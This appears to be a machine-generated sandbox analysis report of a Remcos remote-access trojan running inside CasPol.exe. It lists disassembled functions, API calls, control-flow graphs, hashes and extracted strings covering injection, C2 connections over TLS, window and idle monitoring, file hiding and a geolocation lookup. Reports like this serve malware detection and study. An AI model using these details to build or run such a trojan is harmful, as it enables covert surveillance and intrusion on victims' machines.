                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Name$ComputerUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 4229901323-0
                                                                                                            • Opcode ID: d080141cef9e3990b2f6bec53120ee530cdf67b1126702e4f13589ad74e7334c
                                                                                                            • Instruction ID: 0a408ea7b536296bc4698588bf682dce528bd2697060893402f21fe22c13e40a
                                                                                                            • Opcode Fuzzy Hash: d080141cef9e3990b2f6bec53120ee530cdf67b1126702e4f13589ad74e7334c
                                                                                                            • Instruction Fuzzy Hash: 8801FF7290011CAADB14EB90DC45ADDBBBCEF44715F10017AB501B21D5EFB4AB898A98
                                                                                                            Function 0040E679 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,004145AD,00473EE8,00474A10,00473EE8,00000000,00473EE8,?,00473EE8,5.3.0 Pro), ref: 0040E68D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: InfoLocale
                                                                                                            • String ID:
                                                                                                            • API String ID: 2299586839-0
                                                                                                            • Opcode ID: cfd0bc145c26702e1739b42b90775f026f17fa5d8f36fb20b32d05d25c771de3
                                                                                                            • Instruction ID: fdf89a5244b67fc368892e36cd71d3b7bc7b33248e42f87f25a9228cb5794c84
                                                                                                            • Opcode Fuzzy Hash: cfd0bc145c26702e1739b42b90775f026f17fa5d8f36fb20b32d05d25c771de3
                                                                                                            • Instruction Fuzzy Hash: E6D05E607002197BEA109291DC0AE9B7A9CE700B66F000165BA01E72C0E9A0AF008AE1
                                                                                                            Function 0040D767 Relevance: 95.3, APIs: 13, Strings: 41, Instructions: 799COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 5 40d767-40d7e9 call 41bce3 GetModuleFileNameW call 40e168 call 401fbd * 2 call 41afc3 call 40e8bd call 401d8c call 43e820 22 40d835-40d8fd call 401d64 call 401e8f call 401d64 call 404cbf call 405ce6 call 401eef call 401eea * 2 call 401d64 call 401ebd call 40541d call 401d64 call 404bb1 call 401d64 call 404bb1 5->22 23 40d7eb-40d830 call 40e986 call 401d64 call 401e8f call 40fcba call 40e937 call 40e155 5->23 69 40d950-40d96b call 401d64 call 40b125 22->69 70 40d8ff-40d94a call 4085b4 call 401eef call 401eea call 401e8f call 4124b7 22->70 48 40dc96-40dca7 call 401eea 23->48 79 40d9a5-40d9ac call 40bed7 69->79 80 40d96d-40d98c call 401e8f call 4124b7 69->80 70->69 102 40e134-40e154 call 401e8f call 412902 call 4112b5 70->102 90 40d9b5-40d9bc 79->90 91 40d9ae-40d9b0 79->91 80->79 98 40d98e-40d9a4 call 401e8f call 412902 80->98 95 40d9c0-40d9cc call 41a463 90->95 96 40d9be 90->96 94 40dc95 91->94 94->48 103 40d9d5-40d9d9 95->103 104 40d9ce-40d9d0 95->104 96->95 98->79 107 40da18-40da2b call 401d64 call 401e8f 103->107 108 40d9db call 40697b 103->108 104->103 128 40da32-40daba call 401d64 call 41ae08 call 401e18 call 401e13 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f 107->128 129 40da2d call 4069ba 107->129 117 40d9e0-40d9e2 108->117 120 40d9e4-40d9e9 call 40699d call 4064d0 117->120 121 40d9ee-40da01 call 401d64 call 401e8f 117->121 120->121 121->107 138 40da03-40da09 121->138 163 40db22-40db26 128->163 164 40dabc-40dad5 call 401d64 call 401e8f call 43a611 128->164 129->128 138->107 140 40da0b-40da11 138->140 140->107 142 40da13 call 4064d0 140->142 142->107 166 40dcaa-40dd01 call 436050 call 4022f8 call 401e8f * 2 call 41265d call 4082d7 163->166 167 40db2c-40db33 163->167 164->163 191 40dad7-40db1d call 401d64 call 401e8f call 401d64 call 401e8f call 40c89e call 401e18 call 401e13 164->191 219 40dd06-40dd5c call 401d64 call 401e8f call 401f66 call 401e8f call 4126d2 call 401d64 call 401e8f call 43a5e7 166->219 168 40dbb1-40dbbb call 4082d7 167->168 169 40db35-40dbaf call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 40bc67 167->169 178 40dbc0-40dbe4 call 4022f8 call 4338c8 168->178 169->178 199 40dbf3 178->199 200 40dbe6-40dbf1 call 436050 178->200 191->163 202 40dbf5-40dc40 call 401e07 call 43e349 call 4022f8 call 401e8f call 4022f8 call 401e8f call 4128a2 199->202 200->202 257 40dc45-40dc6a call 4338d1 call 401d64 call 40b125 202->257 272 40dd79-40dd7b 219->272 273 40dd5e 219->273 257->219 274 40dc70-40dc91 call 401d64 call 41ae08 call 40e219 257->274 276 40dd81 272->276 277 40dd7d-40dd7f 272->277 275 40dd60-40dd77 call 41beb0 CreateThread 273->275 274->219 292 40dc93 274->292 280 40dd87-40de66 call 401f66 * 2 call 41a686 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 43a5e7 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f StrToIntA call 409517 call 401d64 call 401e8f 275->280 276->280 277->275 330 40dea1 280->330 331 40de68-40de9f call 43360d call 401d64 call 401e8f CreateThread 280->331 292->94 333 40dea3-40debb call 401d64 call 401e8f 330->333 331->333 342 40def9-40df0c call 401d64 call 401e8f 333->342 343 40debd-40def4 call 43360d call 401d64 call 401e8f CreateThread 333->343 354 40df6c-40df7f call 401d64 call 401e8f 342->354 355 40df0e-40df67 call 401d64 call 401e8f call 401d64 call 401e8f call 40c854 call 401e18 call 401e13 CreateThread 342->355 343->342 365 40df81-40dfb5 call 401d64 call 401e8f call 401d64 call 401e8f call 43a5e7 call 40b95c 354->365 366 40dfba-40dfde call 41a7a2 call 401e18 call 401e13 354->366 355->354 365->366 386 40dfe0-40dfe1 SetProcessDEPPolicy 366->386 387 40dfe3-40dff6 CreateThread 366->387 386->387 390 40e004-40e00b 387->390 391 40dff8-40e002 CreateThread 387->391 394 40e019-40e020 390->394 395 40e00d-40e017 CreateThread 390->395 391->390 398 40e022-40e025 394->398 399 40e033-40e038 394->399 395->394 401 40e073-40e08e call 401e8f call 41246e 398->401 402 40e027-40e031 398->402 404 40e03d-40e06e call 401f66 call 404c9e call 401f66 call 41a686 call 401eea 399->404 414 40e094-40e0d4 call 41ae08 call 401e07 call 412584 call 401e13 call 401e07 401->414 415 40e12a-40e12f call 40cbac call 413fd4 401->415 402->404 404->401 433 40e0ed-40e0f2 DeleteFileW 414->433 415->102 434 40e0f4-40e125 call 41ae08 call 401e07 call 41297a call 401e13 * 2 433->434 435 40e0d6-40e0d9 433->435 434->415 435->434 436 40e0db-40e0e8 Sleep call 401e07 435->436 436->433
                                                                                                            APIs
                                                                                                              • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BCF8
                                                                                                              • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD01
                                                                                                              • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD18
                                                                                                              • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD1B
                                                                                                              • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD2D
                                                                                                              • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD30
                                                                                                              • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD41
                                                                                                              • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD44
                                                                                                              • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD55
                                                                                                              • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD58
                                                                                                              • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD65
                                                                                                              • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD68
                                                                                                              • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD75
                                                                                                              • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD78
                                                                                                              • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD85
                                                                                                              • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD88
                                                                                                              • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BD99
                                                                                                              • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD9C
                                                                                                              • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDA9
                                                                                                              • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
                                                                                                              • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDBD
                                                                                                              • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDC0
                                                                                                              • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDD1
                                                                                                              • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDD4
                                                                                                              • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDE5
                                                                                                              • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDE8
                                                                                                              • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BDF5
                                                                                                              • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
                                                                                                              • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE06
                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000104), ref: 0040D790
                                                                                                              • Part of subcall function 0040FCBA: __EH_prolog.LIBCMT ref: 0040FCBF
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                                                                                            • String ID: (CG$(CG$0DG$@CG$@CG$Access Level: $Administrator$C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$Exe$Inj$Remcos Agent initialized$Software\$User$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$`=G$dCG$del$del$exepath$licence$license_code.txt$BG$BG$BG$BG$BG
                                                                                                            • API String ID: 2830904901-3665108517
                                                                                                            • Opcode ID: bbeaf468ebe3372ece6b74a3a03c9e0c86b481aff26255fbfff681fcf774babf
                                                                                                            • Instruction ID: 4071723a11783d2da8da933f82134b9c6f3815e49c8d87d463163304bf45e319
                                                                                                            • Opcode Fuzzy Hash: bbeaf468ebe3372ece6b74a3a03c9e0c86b481aff26255fbfff681fcf774babf
                                                                                                            • Instruction Fuzzy Hash: 4032A360B043406ADA18B776DC57BBE269A8FC1748F04443FB8467B2E2DE7C9D45839E
                                                                                                            Function 00413FD4 Relevance: 48.1, APIs: 5, Strings: 22, Instructions: 813sleepnetworkCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 447 413fd4-41401f call 401faa call 41aa73 call 401faa call 401d64 call 401e8f call 43a5e7 460 414021-414028 Sleep 447->460 461 41402e-41407c call 401f66 call 401d64 call 401fbd call 41afc3 call 404262 call 401d64 call 40b125 447->461 460->461 476 4140f0-41418a call 401f66 call 401d64 call 401fbd call 41afc3 call 401d64 * 2 call 4085b4 call 4027cb call 401eef call 401eea * 2 call 401d64 call 405422 461->476 477 41407e-4140ed call 401d64 call 4022f8 call 401d64 call 401e8f call 401d64 call 4022f8 call 401d64 call 401e8f call 401d64 call 4022f8 call 401d64 call 401e8f call 404101 461->477 530 41419a-4141a1 476->530 531 41418c-414198 476->531 477->476 532 4141a6-414242 call 40541d call 404cbf call 405ce6 call 4027cb call 401f66 call 41a686 call 401eea * 2 call 401d64 call 401e8f call 401d64 call 401e8f call 413f9a 530->532 531->532 559 414244-41428a WSAGetLastError call 41bc76 call 404c9e call 401f66 call 41a686 call 401eea 532->559 560 41428f-41429d call 4041f1 532->560 583 414b54-414b66 call 4047eb call 4020b4 559->583 566 4142ca-4142df call 404915 call 40428c 560->566 567 41429f-4142c5 call 401f66 * 2 call 41a686 560->567 582 4142e5-414432 call 401d64 * 2 call 404cbf call 405ce6 call 4027cb call 405ce6 call 4027cb call 401f66 call 41a686 call 401eea * 4 call 41a96d call 413683 call 4082dc call 440c51 call 401d64 call 401fbd call 4022f8 call 401e8f * 2 call 41265d 566->582 566->583 567->583 647 414434-414441 call 40541d 582->647 648 414446-41446d call 401e8f call 412513 582->648 595 414b68-414b88 call 401d64 call 401e8f call 43a5e7 Sleep 583->595 596 414b8e-414b96 call 401d8c 583->596 595->596 596->476 647->648 654 414474-414830 call 403b40 call 40cbf1 call 41adee call 41aec8 call 41ad46 call 401d64 GetTickCount call 41ad46 call 41aca0 call 41ad46 * 2 call 41ac52 call 41aec8 * 5 call 40e679 call 41aec8 call 4027ec call 40275c call 4027cb call 40275c call 4027cb * 3 call 40275c call 4027cb call 405ce6 call 4027cb call 405ce6 call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 405ce6 call 4027cb * 5 call 40275c call 4027cb call 40275c call 4027cb * 7 call 40275c 648->654 655 41446f-414471 648->655 781 414832 call 404468 654->781 655->654 782 414837-414abb call 401eea * 50 call 401e13 call 401eea * 6 call 401e13 call 4045d5 781->782 900 414ac0-414ac7 782->900 901 414ac9-414ad0 900->901 902 414adb-414ae2 900->902 901->902 903 414ad2-414ad4 901->903 904 414ae4-414ae9 call 40a767 902->904 905 414aee-414b20 call 405415 call 401f66 * 2 call 41a686 902->905 903->902 904->905 916 414b22-414b2e CreateThread 905->916 917 414b34-414b4f call 401eea * 2 call 401e13 905->917 916->917 917->583
                                                                                                            APIs
                                                                                                            • Sleep.KERNEL32(00000000,00000029,004742F8,?,00000000), ref: 00414028
                                                                                                            • WSAGetLastError.WS2_32 ref: 00414249
                                                                                                            • Sleep.KERNEL32(00000000,00000002), ref: 00414B88
                                                                                                              • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Sleep$ErrorLastLocalTime
                                                                                                            • String ID: | $%I64u$5.3.0 Pro$@CG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$TLS Off$TLS On $XCG$XCG$XCG$`=G$dCG$hlight$name$>G$>G$BG
                                                                                                            • API String ID: 524882891-2450167416
                                                                                                            • Opcode ID: c3a12b7739178762d846dab4c35ba272d4dc73e948148dcf03e39571e7f482de
                                                                                                            • Instruction ID: a0bb0b13232d9f5991351636829aab2dda2428bc81dc0b9639db3628de0ead2f
                                                                                                            • Opcode Fuzzy Hash: c3a12b7739178762d846dab4c35ba272d4dc73e948148dcf03e39571e7f482de
                                                                                                            • Instruction Fuzzy Hash: 58524E31A001145ADB18F771DDA6AEE73A59F90708F1041BFB80A771E2EF385E85CA9D
                                                                                                            Function 00409E48 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 163sleepCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • Sleep.KERNEL32(00001388), ref: 00409E62
                                                                                                              • Part of subcall function 00409D97: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
                                                                                                              • Part of subcall function 00409D97: GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
                                                                                                              • Part of subcall function 00409D97: Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
                                                                                                              • Part of subcall function 00409D97: CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10
                                                                                                            • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00409E9E
                                                                                                            • GetFileAttributesW.KERNEL32(00000000), ref: 00409EAF
                                                                                                            • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 00409EC6
                                                                                                            • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 00409F40
                                                                                                              • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                                                            • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00465900,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A049
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                                                                            • String ID: @CG$@CG$XCG$XCG$xAG$xAG
                                                                                                            • API String ID: 3795512280-3163867910
                                                                                                            • Opcode ID: 25dc6885441413c1cb34c24d28a0f4be4952bc37a9e0bff84388eedc19b5b634
                                                                                                            • Instruction ID: b7dfc09a395f5416f32c5fe597dbb364f69b6ed32616efff49b152d1c9b912f4
                                                                                                            • Opcode Fuzzy Hash: 25dc6885441413c1cb34c24d28a0f4be4952bc37a9e0bff84388eedc19b5b634
                                                                                                            • Instruction Fuzzy Hash: 30518D716043005ACB05BB72D866ABF769AAFD1309F00053FF886B71E2DF3D9D44869A
                                                                                                            Function 0040428C Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 147networkCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1022 40428c-4042ad connect 1023 4043e1-4043e5 1022->1023 1024 4042b3-4042b6 1022->1024 1027 4043e7-4043f5 WSAGetLastError 1023->1027 1028 40445f 1023->1028 1025 4043da-4043dc 1024->1025 1026 4042bc-4042bf 1024->1026 1029 404461-404465 1025->1029 1030 4042c1-4042e8 call 404cbf call 401f66 call 41a686 1026->1030 1031 4042eb-4042f5 call 420151 1026->1031 1027->1028 1032 4043f7-4043fa 1027->1032 1028->1029 1030->1031 1041 404306-404313 call 420373 1031->1041 1042 4042f7-404301 1031->1042 1035 404439-40443e 1032->1035 1036 4043fc-404437 call 41bc76 call 404c9e call 401f66 call 41a686 call 401eea 1032->1036 1038 404443-40445c call 401f66 * 2 call 41a686 1035->1038 1036->1028 1038->1028 1056 404315-404338 call 401f66 * 2 call 41a686 1041->1056 1057 40434c-404357 call 420f34 1041->1057 1042->1038 1085 40433b-404347 call 420191 1056->1085 1068 404389-404396 call 4202ea 1057->1068 1069 404359-404387 call 401f66 * 2 call 41a686 call 420592 1057->1069 1079 404398-4043bb call 401f66 * 2 call 41a686 1068->1079 1080 4043be-4043d7 CreateEventW * 2 1068->1080 1069->1085 1079->1080 1080->1025 1085->1028
                                                                                                            APIs
                                                                                                            • connect.WS2_32(?,?,?), ref: 004042A5
                                                                                                            • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043CB
                                                                                                            • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043D5
                                                                                                            • WSAGetLastError.WS2_32(?,?,?,0040192B), ref: 004043E7
                                                                                                              • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                                                                            • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                                                                            • API String ID: 994465650-2151626615
                                                                                                            • Opcode ID: 2bc5e8461ca3afc75119b91fb400947b0245c98987afaab10fbe88cd63cd31a1
                                                                                                            • Instruction ID: b196b808fbc66b1ac8da6b4b51d7f626a0d3d22bc4cde50e21f83cd2c7739b74
                                                                                                            • Opcode Fuzzy Hash: 2bc5e8461ca3afc75119b91fb400947b0245c98987afaab10fbe88cd63cd31a1
                                                                                                            • Instruction Fuzzy Hash: ED4128B1B00202A7CB04B77A8C5B66D7A55AB81368B40007FF901676D3EE7DAD6087DF
                                                                                                            Function 0040A3F4 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 158sleepCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • __Init_thread_footer.LIBCMT ref: 0040A456
                                                                                                            • Sleep.KERNEL32(000001F4), ref: 0040A461
                                                                                                            • GetForegroundWindow.USER32 ref: 0040A467
                                                                                                            • GetWindowTextLengthW.USER32(00000000), ref: 0040A470
                                                                                                            • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040A4A4
                                                                                                            • Sleep.KERNEL32(000003E8), ref: 0040A574
                                                                                                              • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,?,0040AF3F,?,?,?,?,?,00000000), ref: 00409D84
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                                                                            • String ID: [${ User has been idle for $ minutes }$]
                                                                                                            • API String ID: 911427763-3954389425
                                                                                                            • Opcode ID: 4f8b8cb0c9ee605f642951e99c9669dc9c444aa7125a2f7fdf95d7018cf2d41d
                                                                                                            • Instruction ID: 0ecdfa35f4bf358d0b6072dbfc0ad8fc4f94b2a12b5a089c7f39fa9b67fb4d59
                                                                                                            • Opcode Fuzzy Hash: 4f8b8cb0c9ee605f642951e99c9669dc9c444aa7125a2f7fdf95d7018cf2d41d
                                                                                                            • Instruction Fuzzy Hash: C451DF316083005BC614FB21D84AAAE7794BF84318F50493FF846A62E2EF7C9E55C69F
                                                                                                            Function 0040C89E Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 139COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1177 40c89e-40c8c3 call 401e52 1180 40c8c9 1177->1180 1181 40c9ed-40ca13 call 401e07 GetLongPathNameW call 403b40 1177->1181 1182 40c8d0-40c8d5 1180->1182 1183 40c9c2-40c9c7 1180->1183 1184 40c905-40c90a 1180->1184 1185 40c9d8 1180->1185 1186 40c9c9-40c9ce call 43ac0f 1180->1186 1187 40c8da-40c8e8 call 41a74b call 401e18 1180->1187 1188 40c8fb-40c900 1180->1188 1189 40c9bb-40c9c0 1180->1189 1190 40c90f-40c916 call 41b15b 1180->1190 1207 40ca18-40ca85 call 403b40 call 40cc37 call 402860 * 2 call 401e13 * 5 1181->1207 1192 40c9dd-40c9e2 call 43ac0f 1182->1192 1183->1192 1184->1192 1185->1192 1198 40c9d3-40c9d6 1186->1198 1210 40c8ed 1187->1210 1188->1192 1189->1192 1202 40c918-40c968 call 403b40 call 43ac0f call 403b40 call 402860 call 401e18 call 401e13 * 2 1190->1202 1203 40c96a-40c9b6 call 403b40 call 43ac0f call 403b40 call 402860 call 401e18 call 401e13 * 2 1190->1203 1204 40c9e3-40c9e8 call 4082d7 1192->1204 1198->1185 1198->1204 1216 40c8f1-40c8f6 call 401e13 1202->1216 1203->1210 1204->1181 1210->1216 1216->1181
                                                                                                            APIs
                                                                                                            • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040CA04
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: LongNamePath
                                                                                                            • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                                                                            • API String ID: 82841172-425784914
                                                                                                            • Opcode ID: 32c7dd7da07534816f75e312af4f9c722b84838e0212387709dec4be18cb4e42
                                                                                                            • Instruction ID: 51cedb133b73bca78a9fc1065318242b3d6e678e936cb09da4a185c9a299c852
                                                                                                            • Opcode Fuzzy Hash: 32c7dd7da07534816f75e312af4f9c722b84838e0212387709dec4be18cb4e42
                                                                                                            • Instruction Fuzzy Hash: 39413A721442009BC214FB21DD96DAFB7A4AE90759F10063FB546720E2EE7CAA49C69F
                                                                                                            Function 0041A51B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68networkfileCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1323 41a51b-41a55a call 401faa call 43a88c InternetOpenW InternetOpenUrlW 1328 41a55c-41a57d InternetReadFile 1323->1328 1329 41a5a3-41a5a6 1328->1329 1330 41a57f-41a59f call 401f86 call 402f08 call 401eea 1328->1330 1331 41a5a8-41a5aa 1329->1331 1332 41a5ac-41a5b9 InternetCloseHandle * 2 call 43a887 1329->1332 1330->1329 1331->1328 1331->1332 1337 41a5be-41a5c8 1332->1337
                                                                                                            APIs
                                                                                                            • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041A53E
                                                                                                            • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041A554
                                                                                                            • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041A56D
                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 0041A5B3
                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 0041A5B6
                                                                                                            Strings
                                                                                                            • http://geoplugin.net/json.gp, xrefs: 0041A54E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Internet$CloseHandleOpen$FileRead
                                                                                                            • String ID: http://geoplugin.net/json.gp
                                                                                                            • API String ID: 3121278467-91888290
                                                                                                            • Opcode ID: 36e01e55f813b3e587d73a157094a3d7c5a29764a6c694396ca7ce848afa256e
                                                                                                            • Instruction ID: 402fbdb1aff19a1981f8347c65821a4f206ec005c70a85ea4635686413b1fe25
                                                                                                            • Opcode Fuzzy Hash: 36e01e55f813b3e587d73a157094a3d7c5a29764a6c694396ca7ce848afa256e
